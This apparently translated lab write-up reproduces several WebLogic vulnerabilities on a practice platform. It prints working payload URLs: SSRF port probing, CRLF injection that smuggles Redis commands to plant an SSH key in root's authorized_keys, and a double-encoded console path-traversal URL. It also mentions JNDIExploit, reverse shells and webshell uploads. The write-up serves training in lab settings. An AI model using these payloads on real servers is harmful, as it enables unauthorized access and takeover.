Weblogic vulnerability recurrence

Time:2022-1-19

Weblogic vulnerability recurrence

Weblogic ssrf

https://www.hetianlab.com/expc.do?ec=ECID9d6c0ca797abec2017021014312200001

Experimental environment

WebLogic Server: CentOS 6 5 Weblogic version 10.3.6.0, IP 10.1.1.157
Redis server: centos6 5  redis-2.8.13, IP 10.1.1.111
Host: Kali IP random

Turn off firewall

Start Weblogic

image-20220105233244731

There’s a pit here

Weblogic needs to be hanging backstage all the time

visithttp://10.1.1.157:7001/uddiexplorer/SearchPublicRegistries.jsp?operator=http://127.0.0.1/xxx&rdoSearch=name&btnSubmit=Search

image-20220105233556653image-20220105233608267

Accessed / xxx directory

Fake HTTP header

In the HTTP header, “\ R \ n” is used to split the header, where \ R – >% 0d and \ n – >% 0A, we construct a malicious host header, as follows:http://10.1.1.157:7001/uddiexplorer/SearchPublicRegistries.jsp?operator=http://127.0.0.1/xxx%20HTTP/1.1%0d%0aHOST: www.baidu.com %0d%0aaas%0d%0a&rdoSearch=name&btnSubmit=Search

image-20220105233916412

Port probing using SSRF

visithttp://10.1.1.157:7001/uddiexplorer/SearchPublicRegistries.jsp?operator=http://127.0.0.1:22&rdoSearch=name&btnSubmit=Search

image-20220105234104508

Response received from 127.0.0.1:22

Description port 22 is on

image-20220105234140467

Tried all: ‘1’ addresses, but could not connect to the server via http

Description port 23 is not turned on

Using SSRF to write SSH public key

exp:http://10.1.1.157:7001/uddiexplorer/SearchPublicRegistries.jsp?operator=http://10.1.1.111:6379/hello%20HTTP/1.1%0d%0aset test "\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQClLfjZfhEz8i1Rg0iKNj3WGul+Vb0B7DK77uCYNxLrcTNT0kl+Chkeg2v2gpfCzuINm4nEwu0fznfoSlBtNhYpEgaiKDlKT3AAI6MyKFh5uIq332ihZ4kMO7NefvcMLbPL4XywgM/CnQc90YxDKHbEbjwZTgAzJsnRnCWfv4RzbV+Pq9agSUnURW8hWZ1lxAMFuOFmUBO4Ld5DCFQwUnS5YPJiYgjzks46DZT0n1onZIUh3XP601DGu2TPtuZLs43drjpVoFlOkXkQkFCYJTQQpe89lRl3xoi6lS8Bf+vdaQ5PnBBZDVYRm+NjRCCyWZDSSa5WiwvhcoGmpwl2eud/ [email protected]\n\n\n\n"%0d%0aconfig set dir /root/.ssh/%0d%0aconfig set dbfilename "authotrized_keys"%0d%0a%0d%0asave%0d%0aexit%0d%0asdsdd%0d%0a&rdoSearch=name&btnSubmit=Search

image-20220106000227701

Write successfulimage-20220106000247268

Cve-2021-2109 Weblogic LDAP Remote Code Execution Vulnerability:

https://www.hetianlab.com/expc.do?ec=ECIDa2bb-83d8-4dbe-bc38-0423ce125df7

Visit target 10.1.1.109:7001

img

visit/console/css/%252e%252e%252f/consolejndi.portal

image-20220106003715028

Create a new JNDI server

java -jar JNDIExploit. Jar - I IP (attacker address)

image-20220106122141943image-20220106122153576

Rebound shell

Burp will not be used, and the replay fails

Cnvd-c-2019-48814 Weblogic deserialization remote command execution vulnerability:

https://www.hetianlab.com/expc.do?ec=ECID3f28-5c9a-4f95-999d-68fa2fa7b7aa

image-20220106162056206

Async directory exists

image-20220106162157316

As shown in the figure, the server turns on wls9_ async_ Cnvd-c-2019-48814 vulnerability exists in response component

Rebound shell

image-20220106162533347

Using burp to capture and change packets

image-20220106162551361

202accepted in response indicates success

image-20220106162626092

Successful rebound shell

image-20220106162905715

Automated rebound shell using scripts

Upload webshell

image-20220106163102460

Packet capturing and packet changing

image-20220106163114473

202, success

image-20220106163256489

Python script:

image-20220106163403378

Cve-2020-14882 & 14883 Weblogic unauthorized access vulnerability:

https://www.hetianlab.com/expc.do?ec=ECIDfdd4-97c8-4e32-89b7-df58dd102e4c

Experimental environment

Target: docker + weblogic12 2.1.3  ip:10.1.1.109
Attacker: Kali IP: 10.1.1.110

See if a console exists

http://IP: Port / console

image-20220117095516825

Vulnerability URLhttp://IP: Port / console / CSS /% 252e% 252e% 252fconsole portal

there%252E%252E%252FFor/ URL secondary encoding

image-20220117095647107

The first visit may 404

image-20220117095740274

The second time is normal

Exploit vulnerability

image-20220117100219063

Note: copy to semicolon

image-20220117100249210

Add CMD: command at HTTP header